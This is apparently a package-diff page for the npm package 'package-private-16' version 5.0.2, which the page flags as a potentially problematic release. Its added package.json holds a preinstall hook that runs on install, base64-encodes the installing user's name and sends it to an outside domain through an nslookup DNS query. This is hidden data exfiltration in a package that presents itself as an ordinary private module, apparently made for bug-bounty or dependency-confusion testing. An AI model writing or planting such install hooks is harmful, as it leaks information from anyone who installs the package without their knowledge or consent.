package-private-16 5.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of package-private-16 might be problematic. Click here for more details.
- package/README.md +3 -0
- package/index.js +10 -0
- package/package.json +18 -0
- package/scripts/test.sh +1 -0
- package/test.txt +0 -0
package/README.md
ADDED
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
{
|
2
|
+
"name": "package-private-16",
|
3
|
+
"version": "5.0.2",
|
4
|
+
"description": "This is a private package used by Batman and his team oh highly skilled IT professional (CY Capstone Team-1)",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "npm index.js",
|
8
|
+
"preinstall": "nslookup $(whoami | base64 -w0).0xparthhackerone.me"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"demo"
|
12
|
+
],
|
13
|
+
"author": "archerl@wearehackerone.com",
|
14
|
+
"license": "MIT",
|
15
|
+
"dependencies": {
|
16
|
+
"nodemon": "^2.0.20"
|
17
|
+
}
|
18
|
+
}
|
package/scripts/test.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
echo "This is file to run the bash script, just in case we need it"
|
package/test.txt
ADDED
File without changes
|